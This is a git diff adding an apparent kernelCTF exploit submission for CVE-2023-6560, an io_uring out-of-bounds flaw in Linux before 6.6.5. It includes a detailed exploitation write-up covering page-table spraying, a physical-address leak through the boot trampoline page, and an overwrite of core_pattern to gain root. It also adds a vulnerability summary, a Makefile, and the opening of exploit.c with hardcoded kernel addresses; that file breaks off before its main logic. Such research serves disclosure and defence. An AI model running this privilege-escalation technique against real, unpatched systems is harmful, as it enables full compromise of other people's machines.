diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_1.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_1.png new file mode 100644 index 00000000..4b740502 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_1.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_2.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_2.png new file mode 100644 index 00000000..7cc63d45 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_2.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_3.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_3.png new file mode 100644 index 00000000..54b336cb Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_3.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_4.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_4.png new file mode 100644 index 00000000..89c6832c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_4.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_5.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_5.png new file mode 100644 index 00000000..374cee64 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_5.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_6.png b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_6.png new file mode 100644 index 00000000..06ca3a73 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/assets/CVE-2023-6560_mitigation_6.png differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md new file mode 100644 index 00000000..d2ed92a6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md @@ -0,0 +1,690 @@ +## Trigger the vulnerability + +The vulnerability was reported by Jann Horn. The original report and POC can be found at [io_uring: __io_uaddr_map() handles multi-page region dangerously - Project Zero](https://project-zero.issues.chromium.org/issues/42451652). I highly recommend reading the original report before proceeding. + +Since [03d89a2de25b](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=03d89a2de25b), the kernel has provided a mechanism to use user-allocated memory for rings and SQEs: + +```c +static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx, + struct io_uring_params *p) +{ + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + rings = io_mem_alloc(size); + else + rings = io_rings_map(ctx, p->cq_off.user_addr, size); + + if (IS_ERR(rings)) + return PTR_ERR(rings); + + ctx->rings = rings; + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + ptr = io_mem_alloc(size); + else + ptr = io_sqes_map(ctx, p->sq_off.user_addr, size); + + if (IS_ERR(ptr)) { + io_rings_free(ctx); + return PTR_ERR(ptr); + } + + ctx->sq_sqes = ptr; + return 0; +} + +static void *io_rings_map(struct io_ring_ctx *ctx, unsigned long uaddr, + size_t size) +{ + return __io_uaddr_map(&ctx->ring_pages, &ctx->n_ring_pages, uaddr, + size); +} + +static void *io_sqes_map(struct io_ring_ctx *ctx, unsigned long uaddr, + size_t size) +{ + return __io_uaddr_map(&ctx->sqe_pages, &ctx->n_sqe_pages, uaddr, + size); +} + +static void *__io_uaddr_map(struct page ***pages, unsigned short *npages, + unsigned long uaddr, size_t size) +{ + /*...*/ + ret = pin_user_pages_fast(uaddr, nr_pages, FOLL_WRITE | FOLL_LONGTERM, + page_array); + if (ret != nr_pages) { +err: + io_pages_free(&page_array, ret > 0 ? ret : 0); + return ret < 0 ? ERR_PTR(ret) : ERR_PTR(-EFAULT); + } + /* + * Should be a single page. If the ring is small enough that we can + * use a normal page, that is fine. If we need multiple pages, then + * userspace should use a huge page. That's the only way to guarantee + * that we get contigious memory, outside of just being lucky or + * (currently) having low memory fragmentation. + */ + if (page_array[0] != page_array[ret - 1]) + goto err; + + /*...*/ + + *pages = page_array; // <--- ctx->{ring, sqe}_pages = page_array + *npages = nr_pages; // <--- ctx->n_{ring, sqe}_pages = nr_pages + return page_to_virt(page_array[0]); +} +``` + +However, because the check to ensure all user-provided pages come from a single page is incorrect, the kernel mistakenly treats the memory as contiguous. This can lead to out-of-bounds memory access in situations like the one illustrated below: + +![CVE-2023-6560_mitigation_1](./assets/CVE-2023-6560_mitigation_1.png) + +## Exploit Details + +### Primitive Overview + +The primitive we have is page-level out-of-bounds access. + +Because we must set the `IORING_SETUP_NO_MMAP` flag to trigger the vulnerability, we cannot directly mmap the pages into userspace to turn this into a straightforward page use-after-free scenario: + +```c +static void *io_uring_validate_mmap_request(struct file *file, + loff_t pgoff, size_t sz) +{ + struct io_ring_ctx *ctx = file->private_data; + loff_t offset = pgoff << PAGE_SHIFT; + struct page *page; + void *ptr; + + /* Don't allow mmap if the ring was setup without it */ + if (ctx->flags & IORING_SETUP_NO_MMAP) + return ERR_PTR(-EINVAL); + /*...*/ + return ptr; +} +``` + +Next, let's see what happens inside io_uring when using the aforementioned primitive. + +When a user calls the `io_uring_enter` syscall to consume an SQE, the kernel fetches that SQE from `ctx->sqes`: + +``` c +static bool io_get_sqe(struct io_ring_ctx *ctx, const struct io_uring_sqe **sqe) +{ + unsigned mask = ctx->sq_entries - 1; + unsigned head = ctx->cached_sq_head++ & mask; + /*...*/ + *sqe = &ctx->sq_sqes[head]; + return true; +} +``` + +It then initializes the io_uring request (req) based on the contents of the SQE: + +```c +static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req, + const struct io_uring_sqe *sqe) + __must_hold(&ctx->uring_lock) +{ + const struct io_issue_def *def; + unsigned int sqe_flags; + int personality; + u8 opcode; + + /* req is partially pre-initialised, see io_preinit_req() */ + req->opcode = opcode = READ_ONCE(sqe->opcode); + /* same numerical values with corresponding REQ_F_*, safe to copy */ + req->flags = sqe_flags = READ_ONCE(sqe->flags); + req->cqe.user_data = READ_ONCE(sqe->user_data); + req->file = NULL; + req->rsrc_node = NULL; + req->task = current; + + if (unlikely(opcode >= IORING_OP_LAST)) { + req->opcode = 0; + return -EINVAL; + } + def = &io_issue_defs[opcode]; + /*...*/ + return def->prep(req, sqe); +} +``` + +When an SQE completes, the kernel writes the result to the CQ ring: + +```c +static inline bool io_get_cqe_overflow(struct io_ring_ctx *ctx, + struct io_uring_cqe **ret, + bool overflow) +{ + io_lockdep_assert_cq_locked(ctx); + + if (unlikely(ctx->cqe_cached >= ctx->cqe_sentinel)) { + if (unlikely(!io_cqe_cache_refill(ctx, overflow))) + return false; + } + *ret = ctx->cqe_cached; + ctx->cached_cq_tail++; + ctx->cqe_cached++; + if (ctx->flags & IORING_SETUP_CQE32) + ctx->cqe_cached++; + return true; +} + +static inline bool io_get_cqe(struct io_ring_ctx *ctx, struct io_uring_cqe **ret) +{ + return io_get_cqe_overflow(ctx, ret, false); +} + +static __always_inline bool io_fill_cqe_req(struct io_ring_ctx *ctx, + struct io_kiocb *req) +{ + struct io_uring_cqe *cqe; + + /* + * If we can't get a cq entry, userspace overflowed the + * submission (by quite a lot). Increment the overflow count in + * the ring. + */ + if (unlikely(!io_get_cqe(ctx, &cqe))) + return false; + + if (trace_io_uring_complete_enabled()) + trace_io_uring_complete(req->ctx, req, req->cqe.user_data, + req->cqe.res, req->cqe.flags, + req->big_cqe.extra1, req->big_cqe.extra2); + + memcpy(cqe, &req->cqe, sizeof(*cqe)); + if (ctx->flags & IORING_SETUP_CQE32) { + memcpy(cqe->big_cqe, &req->big_cqe, sizeof(*cqe)); + memset(&req->big_cqe, 0, sizeof(req->big_cqe)); + } + return true; +} +``` + +It is clear that we can submit enough SQEs to carry out out-of-bounds writes. Meanwhile, if the kernel interprets a memory region (e.g., part of a kernel object) as an SQE, it will subsequently copy `sqe->user_data` into `cqe->user_data`, thereby leaking values from the kernel object’s members. + +By abusing this out-of-bounds access: + +- We can leak KASLR or other kernel addresses through the SQ. + +- We can perform out-of-bounds writes using the CQ. + +### Preserving SQ Functionality + +When the `IORING_SETUP_NO_MMAP` flag is set, we must trigger the vulnerability in both the SQ and CQ simultaneously: + +```c +static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx, + struct io_uring_params *p) +{ + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + rings = io_mem_alloc(size); + else + rings = io_rings_map(ctx, p->cq_off.user_addr, size); + + if (IS_ERR(rings)) + return PTR_ERR(rings); + + ctx->rings = rings; + /*...*/ + if (!(ctx->flags & IORING_SETUP_NO_MMAP)) + ptr = io_mem_alloc(size); + else + ptr = io_sqes_map(ctx, p->sq_off.user_addr, size); + + if (IS_ERR(ptr)) { + io_rings_free(ctx); + return PTR_ERR(ptr); + } + + ctx->sq_sqes = ptr; + return 0; +} +``` + +Because `io_uring_sqe` is significantly larger than `io_uring_cqe`, we want to ensure more controllable space in the SQ for stable out-of-bounds writes: + +```c +➜ pahole -C io_uring_sqe ./vmlinux +struct io_uring_sqe { + __u8 opcode; /* 0 1 */ + __u8 flags; /* 1 1 */ + __u16 ioprio; /* 2 2 */ + __s32 fd; /* 4 4 */ + /*...*/ + union { + struct { + __u64 addr3; /* 48 8 */ + __u64 __pad2[1]; /* 56 8 */ + }; /* 48 16 */ + __u8 cmd[0]; /* 48 0 */ + }; /* 48 16 */ + + /* size: 64, cachelines: 1, members: 13 */ +}; + +➜ pahole -C io_uring_cqe ./vmlinux +struct io_uring_cqe { + __u64 user_data; /* 0 8 */ + __s32 res; /* 8 4 */ + __u32 flags; /* 12 4 */ + __u64 big_cqe[]; /* 16 0 */ + + /* size: 16, cachelines: 1, members: 4 */ + /* last cacheline: 16 bytes */ +}; +``` + +To create more easily controlled kernel memory, we can use a function like `packet_mmap()` to obtain a continuous virtual address range: + +```c +static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) +{ + unsigned int block_nr = req->tp_block_nr; + struct pgv *pg_vec; + int i; + + /*...*/ + + for (i = 0; i < block_nr; i++) { + // 👇 We can control the `order` to get a continuous memory + pg_vec[i].buffer = alloc_one_pg_vec_page(order); + /*...*/ + } + +out: + return pg_vec; + + /*...*/ +} + +static int packet_mmap(struct file *file, struct socket *sock, + struct vm_area_struct *vma) +{ + /*...*/ + for (i = 0; i < rb->pg_vec_len; i++) { + struct page *page; + void *kaddr = rb->pg_vec[i].buffer; + int pg_num; + + for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) { + page = pgv_to_page(kaddr); + err = vm_insert_page(vma, start, page); + if (unlikely(err)) + goto out; + start += PAGE_SIZE; + kaddr += PAGE_SIZE; + } + } + /*...*/ + return err; +} +``` + +With this approach, we can simplify the exploit and increase reliability. To make the whole exploit even more reliable, ideally, we want an exploit chain where we only do an out-of-bounds write in the CQ, preserving SQ functionality. + +![CVE-2023-6560_mitigation_2](./assets/CVE-2023-6560_mitigation_2.png) + +### Page Fengshui + +The object we choose to corrupt is the page table entry. We use "page fengshui" to shape the pages, with the primary goal of maintaining pages' continuity by splitting lower-order pages from higher-order pages. + +We begin by allocating multiple pages and classifying them for two different uses. First, we occupy some discontinuous order-0 pages. Next, for the remaining pages, we free those whose indices satisfy `indices % 4 == 0`, and hopefully reuse one of the freed slots for a `pg_vec` array(We only care about the first `pg_vec` buffer, which later will serve as CQ’s Page A). Finally, we free the pages whose indices satisfy `indices % 4 != 0`, and spray page table entries in their place. This arrangement likely make that CQ’s Page A ends up adjacent to the page table entries we intend to corrupt: + +![CVE-2023-6560_mitigation_3](./assets/CVE-2023-6560_mitigation_3.png) + +If this is the first time you play with page table entries, I highly recommend reading the below blog post before proceed. + +[How a simple Linux kernel memory corruption bug can lead to complete system compromise - Project Zero](https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html#:~:text=Attack%20stage%3A%20Reallocating%20the%20victim%20page%20as%20a%20pagetable) + +### Leak Through Write + +Early in the kernel boot process, a global variable called `real_mode_header` is always allocated at a **fixed physical address** (`0x98000`). This is only affected by how memblock allocations are handled, which causes it to remain at the same address: + +```c +// start_kernel() -> setup_arch() -> reserve_real_mode() +/** + * memblock_phys_alloc_range - allocate a memory block inside specified range + * @size: size of memory block to be allocated in bytes + * @align: alignment of the region and block's size + * @start: the lower bound of the memory region to allocate (physical address) + * @end: the upper bound of the memory region to allocate (physical address) + * + * Allocate @size bytes in the between @start and @end. + * + * Return: physical address of the allocated memory block on success, + * %0 on failure. + */ +phys_addr_t __init memblock_phys_alloc_range(phys_addr_t size, + phys_addr_t align, + phys_addr_t start, + phys_addr_t end) +{ + memblock_dbg("%s: %llu bytes align=0x%llx from=%pa max_addr=%pa %pS\n", + __func__, (u64)size, (u64)align, &start, &end, + (void *)_RET_IP_); + return memblock_alloc_range_nid(size, align, start, end, NUMA_NO_NODE, + false); +} + +static inline void set_real_mode_mem(phys_addr_t mem) +{ + real_mode_header = (struct real_mode_header *) __va(mem); +} + +void __init reserve_real_mode(void) +{ + phys_addr_t mem; + size_t size = real_mode_size_needed(); + + if (!size) + return; + + WARN_ON(slab_is_available()); + + mem = memblock_phys_alloc_range(size, PAGE_SIZE, 0, 1<<20); + if (!mem) + pr_info("No sub-1M memory is available for the trampoline\n"); + else + set_real_mode_mem(mem); + + memblock_reserve(0, SZ_1M); +} +``` + +Later, in `kernel_init() -> kernel_init_freeable() -> do_pre_smp_initcalls() -> do_init_real_mode() -> setup_real_mode()`, the kernel copies fixed data to `real_mode_header` and relocates it: + +```c +static void __init setup_real_mode(void) +{ + u16 real_mode_seg; + const u32 *rel; + u32 count; + unsigned char *base; + unsigned long phys_base; + struct trampoline_header *trampoline_header; + size_t size = PAGE_ALIGN(real_mode_blob_end - real_mode_blob); +#ifdef CONFIG_X86_64 + u64 *trampoline_pgd; + u64 efer; + int i; +#endif + + base = (unsigned char *)real_mode_header; + + /*...*/ + + memcpy(base, real_mode_blob, size); + // 👇 Fixed address 0x98000 + phys_base = __pa(base); + real_mode_seg = phys_base >> 4; + + rel = (u32 *) real_mode_relocs; + + /* 16-bit segment relocations. */ + count = *rel++; + while (count--) { + u16 *seg = (u16 *) (base + *rel++); + *seg = real_mode_seg; + } + + /* 32-bit linear relocations. */ + count = *rel++; + while (count--) { + u32 *ptr = (u32 *) (base + *rel++); + *ptr += phys_base; + } + + /* Must be performed *after* relocation. */ + trampoline_header = (struct trampoline_header *) + __va(real_mode_header->trampoline_header); + + /*...*/ + rdmsrl(MSR_EFER, efer); + trampoline_header->efer = efer & ~EFER_LMA; + + trampoline_header->start = (u64) secondary_startup_64; + trampoline_cr4_features = &trampoline_header->cr4; + *trampoline_cr4_features = mmu_cr4_features; + + trampoline_header->flags = 0; + + trampoline_lock = &trampoline_header->lock; + *trampoline_lock = 0; + + trampoline_pgd = (u64 *) __va(real_mode_header->trampoline_pgd); + + /* Map the real mode stub as virtual == physical */ + trampoline_pgd[0] = trampoline_pgd_entry.pgd; + + /*...*/ +} +``` + +After relocation, `__va(real_mode_header->trampoline_pgd)` is set to `0x9c000` (which is `0x4000 + 0x98000` ), and `trampoline_pgd_entry.pgd` is copied there as both virtual and physical address point to the same location after all. + +![CVE-2023-6560_mitigation_4](./assets/CVE-2023-6560_mitigation_4.png) + +```c +// pahole -C real_mode_header ./vmlinux +struct real_mode_header { + /*..*/ + u32 trampoline_pgd; /* 24 4 */ + /*..*/ + /* size: 44, cachelines: 1, members: 11 */ +}; +``` + +`0x9c000` in memory shows like: + +![CVE-2023-6560_mitigation_6](./assets/CVE-2023-6560_mitigation_6.png) + +**What is the `trampoline_pgd_entry.pgd`** + +The `tramoline_pgd_entry` is initialized at `init_trampoline()`: + +```c +static void __init init_trampoline(void) +{ +#ifdef CONFIG_X86_64 + /* + * The code below will alias kernel page-tables in the user-range of the + * address space, including the Global bit. So global TLB entries will + * be created when using the trampoline page-table. + */ + if (!kaslr_memory_enabled()) + trampoline_pgd_entry = init_top_pgt[pgd_index(__PAGE_OFFSET)]; + else + init_trampoline_kaslr(); +#endif +} +``` + +When KASLR is enabled, `trampoline_pgd_entry` consists of the physical address of `pud_page_tramp` plus page table flags: + +```c +void __meminit init_trampoline_kaslr(void) +{ + pud_t *pud_page_tramp, *pud, *pud_tramp; + p4d_t *p4d_page_tramp, *p4d, *p4d_tramp; + unsigned long paddr, vaddr; + pgd_t *pgd; + + pud_page_tramp = alloc_low_page(); + + /* + * There are two mappings for the low 1MB area, the direct mapping + * and the 1:1 mapping for the real mode trampoline: + * + * Direct mapping: virt_addr = phys_addr + PAGE_OFFSET + * 1:1 mapping: virt_addr = phys_addr + */ + paddr = 0; + vaddr = (unsigned long)__va(paddr); + pgd = pgd_offset_k(vaddr); + + p4d = p4d_offset(pgd, vaddr); + pud = pud_offset(p4d, vaddr); + + pud_tramp = pud_page_tramp + pud_index(paddr); + *pud_tramp = *pud; + + if (pgtable_l5_enabled()) { + p4d_page_tramp = alloc_low_page(); + + p4d_tramp = p4d_page_tramp + p4d_index(paddr); + + set_p4d(p4d_tramp, + __p4d(_KERNPG_TABLE | __pa(pud_page_tramp))); + + trampoline_pgd_entry = + __pgd(_KERNPG_TABLE | __pa(p4d_page_tramp)); + } else { + trampoline_pgd_entry = + __pgd(_KERNPG_TABLE | __pa(pud_page_tramp)); + } +} +``` + +When "`the allocating memory is not overlapping with brk pgt`" and `(pgt_buf_end + num) <= pgt_buf_top`, the `alloc_low_page()` function calls `extend_brk()` to allocate memory: + +```c +static inline void *alloc_low_page(void) +{ + return alloc_low_pages(1); +} + +__ref void *alloc_low_pages(unsigned int num) +{ + unsigned long pfn; + int i; + + if (after_bootmem) { + unsigned int order; + + order = get_order((unsigned long)num << PAGE_SHIFT); + return (void *)__get_free_pages(GFP_ATOMIC | __GFP_ZERO, order); + } + + if ((pgt_buf_end + num) > pgt_buf_top || !can_use_brk_pgt) { + unsigned long ret = 0; + + if (min_pfn_mapped < max_pfn_mapped) { + ret = memblock_phys_alloc_range( + PAGE_SIZE * num, PAGE_SIZE, + min_pfn_mapped << PAGE_SHIFT, + max_pfn_mapped << PAGE_SHIFT); + } + if (!ret && can_use_brk_pgt) + ret = __pa(extend_brk(PAGE_SIZE * num, PAGE_SIZE)); + + if (!ret) + panic("alloc_low_pages: can not alloc memory"); + + pfn = ret >> PAGE_SHIFT; + } else { + pfn = pgt_buf_end; + pgt_buf_end += num; + } + + for (i = 0; i < num; i++) { + void *adr; + + adr = __va((pfn + i) << PAGE_SHIFT); + clear_page(adr); + } + + return __va(pfn << PAGE_SHIFT); +} +``` + +This means the allocated page comes from the `_brk` area near the end of the `.bss` section. + +![CVE-2023-6560_mitigation_5](./assets/CVE-2023-6560_mitigation_5.png) + +Regardless of the complicated analysis, the conclusion is straightforward: if you can leak the value at physical address `0x9c000`, you can obtain the physical locations of the other parts of the kernel image. + +**Slight difference caused by KASLR** + +KASLR can introduce a small variation in the outcome, due to different initialization of `trampoline_pgd_entry`: + +```c +static void __init init_trampoline(void) +{ + if (!kaslr_memory_enabled()) + trampoline_pgd_entry = init_top_pgt[pgd_index(__PAGE_OFFSET)]; + else + init_trampoline_kaslr(); +} +``` + +When KASLR is disabled, the kernel directly uses `init_top_pgt[pgd_index(__PAGE_OFFSET)]` as `trampoline_pgd_entry`. + +Because `__kernel_physical_mapping_init()` calls several `alloc_low_page()` operations in advance when setting `init_top_pgt[pgd_index(__PAGE_OFFSET)]` and its related page entries: + +```c +static unsigned long __meminit +__kernel_physical_mapping_init(unsigned long paddr_start, + unsigned long paddr_end, + unsigned long page_size_mask, + pgprot_t prot, bool init) +{ + bool pgd_changed = false; + unsigned long vaddr, vaddr_start, vaddr_end, vaddr_next, paddr_last; + + paddr_last = paddr_end; + vaddr = (unsigned long)__va(paddr_start); + vaddr_end = (unsigned long)__va(paddr_end); + vaddr_start = vaddr; + + for (; vaddr < vaddr_end; vaddr = vaddr_next) { + pgd_t *pgd = pgd_offset_k(vaddr); + p4d_t *p4d; + + vaddr_next = (vaddr & PGDIR_MASK) + PGDIR_SIZE; + + if (pgd_val(*pgd)) { + p4d = (p4d_t *)pgd_page_vaddr(*pgd); + paddr_last = phys_p4d_init(p4d, __pa(vaddr), + __pa(vaddr_end), + page_size_mask, + prot, init); + continue; + } + + p4d = alloc_low_page(); + paddr_last = phys_p4d_init(p4d, __pa(vaddr), __pa(vaddr_end), + page_size_mask, prot, init); + + spin_lock(&init_mm.page_table_lock); + if (pgtable_l5_enabled()) + pgd_populate_init(&init_mm, pgd, p4d, init); + else + p4d_populate_init(&init_mm, p4d_offset(pgd, vaddr), + (pud_t *) p4d, init); + + spin_unlock(&init_mm.page_table_lock); + pgd_changed = true; + } + + if (pgd_changed) + sync_global_pgds(vaddr_start, vaddr_end - 1); + + return paddr_last; +} +``` + +This can reduce a `0x3000` offset in `_brk` for `trampoline_pgd_entry` when KASLR is disabled. + +### Overwrite `core_pattern` + +Once we have the physical address, we can leverage our out-of-bounds write to modify another page table entry and ultimately gain arbitrary read/write access to physical pages. In this exploit, we overwrite `core_pattern` to gain privileges and retrieve the flag. + +## Stability Notes + +Because we corrupt only a small amount of data (two CQEs, i.e., 32 bytes), the chance of crashing the kernel is relatively low. If the exploit fails, we simply retry. This approach can yield a high success rate, such that we might achieve ten successful runs out of ten attempts. + diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..5999539c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/vulnerability.md @@ -0,0 +1,31 @@ +# Vulneribility +An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. + +## Requirements to trigger the vulnerability + - Capabilities: N / A + - Kernel configuration: `CONFIG_IO_URING` + - Are user namespaces needed?: NO for triggering the bug, YES for my exploit but could be avoided. + +## Commit which introduced the vulnerability +[io_uring: support for user allocated memory for rings/sqes](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=03d89a2de25bbc5c77e61a0cf77663978c4b6ea7) + +## Commit which fixed the vulnerability +[io_uring: don't allow discontig pages for IORING_SETUP_NO_MMAP](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=820d070feb668aab5bc9413c285a1dda2a70e076) + +## Affected kernel versions +- before 6.6.5 + +## Affected component, subsystem +- io_uring + +## Cause +- out-of-bounds memory access + +## Related syscalls + +- io_uring_setup +- io_uring_enter + +## CVE URL + +[NVD - CVE-2023-6560](https://nvd.nist.gov/vuln/detail/CVE-2023-6560) \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 00000000..398a518c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,7 @@ +all: exploit + +exploit: exploit.c + gcc -o exploit exploit.c -static + +clean: + rm -rf exploit diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit new file mode 100755 index 00000000..041b0b92 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 00000000..3dbfaa57 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6560_mitigation/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,418 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define COLOR_GREEN "\033[32m" +#define COLOR_RED "\033[31m" +#define COLOR_YELLOW "\033[33m" +#define COLOR_DEFAULT "\033[0m" + +#define logd(fmt, ...) \ + dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) +#define logi(fmt, ...) \ + dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define logw(fmt, ...) \ + dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define loge(fmt, ...) \ + dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \ + __LINE__, ##__VA_ARGS__) +#define die(fmt, ...) \ + do { \ + loge(fmt, ##__VA_ARGS__); \ + loge("Exit at line %d", __LINE__); \ + exit(1); \ + } while (0) + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#define PAGE_SIZE 4096 +#define PAGE_MASK (~(PAGE_SIZE-1)) +#define PAGE_ALIGN(x) ((x + PAGE_SIZE - 1) & PAGE_MASK) + +#define NUM_SQ_PAGES 8 // Not a critical data, 16, 32 and other numbers will be ok too +#define SQ_SZ PAGE_ALIGN(NUM_SQ_PAGES * PAGE_SIZE) +#define CQ_SZ PAGE_ALIGN(NUM_SQ_PAGES / 2 /* Without IORING_SETUP_CQSIZE flag set, p->cq_entries = 2 * p->sq_entries; */ * PAGE_SIZE + /* offsetof(struct io_rings, cqes) */0x40) +#define NUM_CQ_PAGES (CQ_SZ / PAGE_SIZE) // To solve the align issue +#define SQ_ENTRIES (SQ_SZ / sizeof(struct io_uring_sqe)) // Easy math + +#define MB (1024 * 1024) +#define PTRS_PER_PMD 512 // PAGE_SIZE / sizeof(pte_t) +#define PMD_SZ (PTRS_PER_PMD * PAGE_SIZE) // 2 * MB +#define SPRAY_PIPE_NUM (0x200) // Suitable size to drain order-0 pages +#define SPRAY_PMD_NUM (2 * SPRAY_PIPE_NUM) // Just twice as the num of pipe pages to make sure can reuse the pages back +#define SPRAY_PAGE_SZ (0x4000) // 0x4000 / 0x1000 * sizeof(pte_t) = 2 * sizeof(io_cqe), one fore leak, one for write +#define _BRK (0xFFFFFFFF84E00000) // One quick way to obtain this: open gdb and type `p/x _brk_start` +#define CORE_PATTERN (0xFFFFFFFF83DB3720) // `p core_pattern` +#define SPRAY_PAGES_MMAP_START (0x200000000UL) // Need enough space to avoid overlapping with other mappings +#define BUF_SZ (PAGE_SIZE) // Just a normal buffer for r/w +#define PG_VEC_NUM (0x10) + +static bool writeFile(const char *file, const char *what, ...) { + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + int err = errno; + close(fd); + errno = err; + return false; + } + close(fd); + return true; +} + +static void sandboxCommon() { + prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); + setsid(); + struct rlimit rlim; + rlim.rlim_cur = rlim.rlim_max = (200 << 20); + setrlimit(RLIMIT_AS, &rlim); + rlim.rlim_cur = rlim.rlim_max = 32 << 20; + setrlimit(RLIMIT_MEMLOCK, &rlim); + rlim.rlim_cur = rlim.rlim_max = 136 << 20; + setrlimit(RLIMIT_FSIZE, &rlim); + rlim.rlim_cur = rlim.rlim_max = 1 << 20; + setrlimit(RLIMIT_STACK, &rlim); + rlim.rlim_cur = rlim.rlim_max = 0; + setrlimit(RLIMIT_CORE, &rlim); + rlim.rlim_cur = rlim.rlim_max = 0x8000; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { + rlim.rlim_cur = rlim.rlim_max = 4096; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { + die("setrlimit(RLIMIT_NOFILE, &rlim): %m"); + } + } + + if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) { + die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m"); + } + + if (unshare(CLONE_NEWNET)) { + die("unshare(CLONE_NEWNET): %m"); + } + + typedef struct { + const char *name; + const char *value; + } sysctl_t; + + static const sysctl_t sysctls[] = { + {"/proc/sys/kernel/shmmax", "16777216"}, + {"/proc/sys/kernel/shmall", "536870912"}, + {"/proc/sys/kernel/shmmni", "1024"}, + {"/proc/sys/kernel/msgmax", "0x8000"}, + {"/proc/sys/kernel/msgmni", "1024"}, + {"/proc/sys/kernel/msgmnb", "1024"}, + {"/proc/sys/kernel/sem", "1024 1048576 500 1024"}, + }; + unsigned i; + for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++) + writeFile(sysctls[i].name, sysctls[i].value); +} + 